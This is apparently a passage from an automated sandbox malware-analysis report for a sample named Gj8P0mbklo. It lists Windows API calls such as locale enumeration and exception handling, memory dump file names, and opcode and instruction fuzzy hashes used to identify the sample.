• Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
Similarity
• API ID: ErrorLast$EnumLocalesSystem
• String ID:
• API String ID: 2417226690-0
• Opcode ID: 306884e0f7a589b2846fe9bd871d28213b9400e81979bcbb0604e363e2c49350
• Instruction ID: 7f36ad94ad421d50e219746b5203091d816d5bfc1503547e40dd440ce081d3f9
• Opcode Fuzzy Hash: 306884e0f7a589b2846fe9bd871d28213b9400e81979bcbb0604e363e2c49350
• Instruction Fuzzy Hash: C6114C372107059FDB18BF39D8915BABB92FF84368B15442DE64747A40D3717843C740
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00386179: GetLastError.KERNEL32(00000000,?,00388639), ref: 0038617D
  • Part of subcall function 00386179: SetLastError.KERNEL32(00000000,00000000,00000000,00000006,000000FF), ref: 0038621F
• GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0038D2BC,00000000,00000000,?), ref: 0038D55B
Memory Dump Source
• Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
• Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
Similarity
• API ID: ErrorLast$InfoLocale
• String ID:
• API String ID: 3736152602-0
• Opcode ID: 888578e11f6349b1d28d8970bb3125dc7d2830bd05dd3db0f5f3aab95660463d
• Instruction ID: ed9b9f392f60677b4a93d3e48cde2177e098d13b58ff520b5ab2a29fe9ef05b1
• Opcode Fuzzy Hash: 888578e11f6349b1d28d8970bb3125dc7d2830bd05dd3db0f5f3aab95660463d
• Instruction Fuzzy Hash: 5501FE72610312BBDB297B659C06ABB7758DB41758F15446BEC03A75C0EB34FD41C790
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00386179: GetLastError.KERNEL32(00000000,?,00388639), ref: 0038617D
  • Part of subcall function 00386179: SetLastError.KERNEL32(00000000,00000000,00000000,00000006,000000FF), ref: 0038621F
• EnumSystemLocalesW.KERNEL32(0038D300,00000001,00000000,?,-00000050,?,0038D6A9,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 0038D057
Memory Dump Source
• Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
• Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
Similarity
• API ID: ErrorLast$EnumLocalesSystem
• String ID:
• API String ID: 2417226690-0
• Opcode ID: ee7048137b8160a6959d7677e5b2f8e7b5e10e2e75be8a32d30d9b1c2ba1f146
• Instruction ID: 0d70ba480c458a1c12f4a94b16b3d98c64973b15f8e68683accb9e56ac624b0e
• Opcode Fuzzy Hash: ee7048137b8160a6959d7677e5b2f8e7b5e10e2e75be8a32d30d9b1c2ba1f146
• Instruction Fuzzy Hash: A8F0F6762003045FDB267F35AC81A7A7BA5EF80768F0544ADF9464B6D1C6B19C42C750
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00383F51: EnterCriticalSection.KERNEL32(?,?,0038138C,00000000,003A55D0,0000000C,00381354,?,?,00385224,?,?,00386317,00000001,00000364,?), ref: 00383F60
• EnumSystemLocalesW.KERNEL32(00386940,00000001,003A5878,0000000C,00386D75,00000000), ref: 00386985
Memory Dump Source
• Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
• Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
Similarity
• API ID: CriticalEnterEnumLocalesSectionSystem
• String ID:
• API String ID: 1272433827-0
• Opcode ID: 221d001ad71754c93ba331c25ea4c9831f0f98fd3077f31b576e3fa05a09d5ff
• Instruction ID: bab5c16fff799b8debe3e20bd5b495c54316065ea162f87678fa2225af914478
• Opcode Fuzzy Hash: 221d001ad71754c93ba331c25ea4c9831f0f98fd3077f31b576e3fa05a09d5ff
• Instruction Fuzzy Hash: B2F04932A01304DFD702EF98E842B9D7BF4EB4A720F00419AF415DB2A1DBB999048F40
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00386179: GetLastError.KERNEL32(00000000,?,00388639), ref: 0038617D
  • Part of subcall function 00386179: SetLastError.KERNEL32(00000000,00000000,00000000,00000006,000000FF), ref: 0038621F
• EnumSystemLocalesW.KERNEL32(0038CE80,00000001,00000000,?,?,0038D703,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 0038CF5E
Memory Dump Source
• Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
• Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
Similarity
• API ID: ErrorLast$EnumLocalesSystem
• String ID:
• API String ID: 2417226690-0
• Opcode ID: e252d5b591816923ae72f885aacfd8c4bb8a0e702958ff1fe6d65ab6185ba15b
• Instruction ID: 706f92410b1367afd182625b094b631e6f36bfaf8cf5c32d032bb38e9570cd5f
                                                                                                                                                                                            • Opcode Fuzzy Hash: e252d5b591816923ae72f885aacfd8c4bb8a0e702958ff1fe6d65ab6185ba15b
                                                                                                                                                                                            • Instruction Fuzzy Hash: BBF02B3631030557DB16BF35DC46A6A7F95EFC1B60F07409DFB058B251C6729882CBA0
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,00383A27,?,20001004,00000000,00000002,?,?,00383019), ref: 00386EAD
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: InfoLocale
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2299586839-0
                                                                                                                                                                                            • Opcode ID: 0225b05b516c9c04dbfb43cd3af40b1eb341cfddae9fc6ac5208c847de063f21
                                                                                                                                                                                            • Instruction ID: 39b3cfeafd81ddea7b41a727b83ed293f403bccc5898067b600951726285730d
                                                                                                                                                                                            • Opcode Fuzzy Hash: 0225b05b516c9c04dbfb43cd3af40b1eb341cfddae9fc6ac5208c847de063f21
                                                                                                                                                                                            • Instruction Fuzzy Hash: 22E01A35501218BBCF133F61EC06A9E7A1AEB44750F158051FC0565162CB769A21ABA0
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            APIs
                                                                                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(Function_000254F0,00374FA5), ref: 003754DA
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 3192549508-0
                                                                                                                                                                                            • Opcode ID: 537b60914795d2ffbb1727216031c144f9c57c213a55bea8a2b71f9ac91d9e8e
                                                                                                                                                                                            • Instruction ID: 9aa3f20f51458cbc38235a31920c8716b6bb4572b0afdd2a34258cddb2f5b717
                                                                                                                                                                                            • Opcode Fuzzy Hash: 537b60914795d2ffbb1727216031c144f9c57c213a55bea8a2b71f9ac91d9e8e
                                                                                                                                                                                            • Instruction Fuzzy Hash:
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: ad3997cef4ef57c87b2df7ed3027d3610b58ecc720e588a6114c161b16f2395d
                                                                                                                                                                                            • Instruction ID: 82fdedba63d7d7f7aaffc13eeb8b8011b170f123594ec327bf59d4c322dcf114
                                                                                                                                                                                            • Opcode Fuzzy Hash: ad3997cef4ef57c87b2df7ed3027d3610b58ecc720e588a6114c161b16f2395d
                                                                                                                                                                                            • Instruction Fuzzy Hash: 7C52F330911764CFCB2ACF29C890AAABBF1FF56301F2545ADC99A5B762C735A944CF40
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 74267836dbd94e7d3a2c1cb3b76102863863d06f78ddeee11761d071d833486f
                                                                                                                                                                                            • Instruction ID: 309f4d6280a5222076d5c8b5d4af698832d727346af9a371b42b1cf50bf486fc
                                                                                                                                                                                            • Opcode Fuzzy Hash: 74267836dbd94e7d3a2c1cb3b76102863863d06f78ddeee11761d071d833486f
                                                                                                                                                                                            • Instruction Fuzzy Hash: C1321622D29F054DD723A634D962335A28DAFB77C4F15D737F81AB5EA9EB29C4834200
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: a60c549f80fe78a74d5238dce8473fe94ba7a031f76263a2b31d4f1ff122ed15
                                                                                                                                                                                            • Instruction ID: f49166c6e8484fcc3ea99d432f047efeaa97e2493d629fc9c4e83e8adfe0f1af
                                                                                                                                                                                            • Opcode Fuzzy Hash: a60c549f80fe78a74d5238dce8473fe94ba7a031f76263a2b31d4f1ff122ed15
                                                                                                                                                                                            • Instruction Fuzzy Hash: 2A42AA75A00745CFCB2ACF69C490AAAFBF1FF49300F15856DD89A97761DB34AA49CB00
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: a092acdacc76dc27789071abbf0051a22fe177ea77401910d0dee0bc6436ac02
                                                                                                                                                                                            • Instruction ID: 1863d925a9ede4fb673010ab476a456cbae1974196c8b43ac93d22e1a3012617
• Opcode Fuzzy Hash: a092acdacc76dc27789071abbf0051a22fe177ea77401910d0dee0bc6436ac02
• Instruction Fuzzy Hash: 8D120270511B108FC726CF2AC690A27BBF1FF9A712B50492DDAA787B61D275F848CB14
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
• Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d34134334a96e5e8a5f3ab68a66cb4face8efe908b5072a97ed10b3434ec3b8d
• Instruction ID: ddae6383549dec7bca98de12b92dc77467faae870d62e0254b83a41a16748147
• Opcode Fuzzy Hash: d34134334a96e5e8a5f3ab68a66cb4face8efe908b5072a97ed10b3434ec3b8d
• Instruction Fuzzy Hash: 85E1C231A05749CFCB25CFACC890AAEFBB1BF55300F44865DD895AB752D730A909CBA1
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
• Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 6b398e0b8955f8ef9b1e5cfa2d8b035cd945e9b0d9480a05c98fe97178754874
• Instruction ID: b44fe99072cbf25e24a51f6207f3b9362d511f467d07f302a23fe96f23b4334f
• Opcode Fuzzy Hash: 6b398e0b8955f8ef9b1e5cfa2d8b035cd945e9b0d9480a05c98fe97178754874
• Instruction Fuzzy Hash: 90E17F31A002298BDB29CF18D990BE9B7B1FF88345F5581E9D94DD7251EB309E89CF80
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
• Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
Similarity
• API ID: ErrorLast
• String ID:
• API String ID: 1452528299-0
• Opcode ID: af4dfd7f1f84c0d6c6ee2218b506076aee87df8bb7f2ca245146401c4ca9790a
• Instruction ID: 5eb819f75d7b316c106bcf8a7efb1586e78a35f98e6dd8ef274ec8ed61882158
• Opcode Fuzzy Hash: af4dfd7f1f84c0d6c6ee2218b506076aee87df8bb7f2ca245146401c4ca9790a
• Instruction Fuzzy Hash: 5CB108755107058FDB3ABB64CC92AB7B3A8EF44308F1445EDE983CA681EB75E985C720
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
• Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: ee9ba8bfa531ce40467e685b095d8daa654b7e8ac396933399f30aa467eb99b9
• Instruction ID: 14f22b5ef377528b626bd5762ae1924364b05cd28d45f6940672a98811f59374
• Opcode Fuzzy Hash: ee9ba8bfa531ce40467e685b095d8daa654b7e8ac396933399f30aa467eb99b9
• Instruction Fuzzy Hash: 02D19F71A006159FCB25CF29C480A69F7F1FF48351F15822AEC59DBBA0E335EA94CB90
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
• Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a2dc898d737d19a1a4b06b7d0657b0796c45c47f7307a70611bbd8b3659b17b1
• Instruction ID: 4dad956bc4de35b8a81948007ed225e0bf0834033ab235543fc599ffaef66c0a
• Opcode Fuzzy Hash: a2dc898d737d19a1a4b06b7d0657b0796c45c47f7307a70611bbd8b3659b17b1
• Instruction Fuzzy Hash: 49C1C376E002195BEF08DEA8CC917FDBAB2EB88310F0D8539E911F7346CAB959119794
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
• Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: f46b2199bda3e1955c96c36a9b63bde5b36e1d127035934c2da0b71684e817e1
• Instruction ID: 04ede8dff3edcb5e69a33bd5672e87e962f833d87ad642e2d2b13b377cd000eb
• Opcode Fuzzy Hash: f46b2199bda3e1955c96c36a9b63bde5b36e1d127035934c2da0b71684e817e1
• Instruction Fuzzy Hash: F4B169346187868FC30ACF28C45066AFBE1BF99304F948A1EF886C7755E770E955CB86
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
• Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: cbd5154997df5bd859549a31d51ee0ac633cd2f073188a6de64b8bae13f094db
• Instruction ID: e7d016d6b601dafd89c1e8289029fae129567072a2423850d20703c7fdbd9473
• Opcode Fuzzy Hash: cbd5154997df5bd859549a31d51ee0ac633cd2f073188a6de64b8bae13f094db
• Instruction Fuzzy Hash: BD617B71E0020A9FDB15CF69C8806AEB7F6EF99310F25C569D956E7748E730EA11CB80
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
• Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 722686e66830387311d75355ad13908e5f66143ec5f07f46730c677e0da0fefd
• Instruction ID: e4a476b8a88518109d0018a8b010521ca83c01e9c354daaabdff07e9629a4ee7
• Opcode Fuzzy Hash: 722686e66830387311d75355ad13908e5f66143ec5f07f46730c677e0da0fefd
                                                                                                                                                                                            • Instruction Fuzzy Hash: 0A511673E001246BDB18EAA99C41DBFF7BADFC9314B06817AF805FB241D6369D018AD0
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 31bd7eb2b6502ce20005ed65f0aff3a0bb4fc125eb5ad9bc68e54f3051c90e1f
                                                                                                                                                                                            • Instruction ID: 465706fda8e1adeb9421e971a3c3fa5ff1a2aa6fd5eefd68d3f961fa2d75f357
                                                                                                                                                                                            • Opcode Fuzzy Hash: 31bd7eb2b6502ce20005ed65f0aff3a0bb4fc125eb5ad9bc68e54f3051c90e1f
                                                                                                                                                                                            • Instruction Fuzzy Hash: DB814535E00245CFDB26CF68C4907AEFBB2AF56300F1586ACD84887353C7399A49DB60
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: a1e4ea8a0b040e841178d5b6f644c211451be2941b5ad59dbd2e94a292912edc
                                                                                                                                                                                            • Instruction ID: 3573e0eb6695f3a0f83653006bbacbafe1ddcad37a5c60a818d7243a047f3e96
                                                                                                                                                                                            • Opcode Fuzzy Hash: a1e4ea8a0b040e841178d5b6f644c211451be2941b5ad59dbd2e94a292912edc
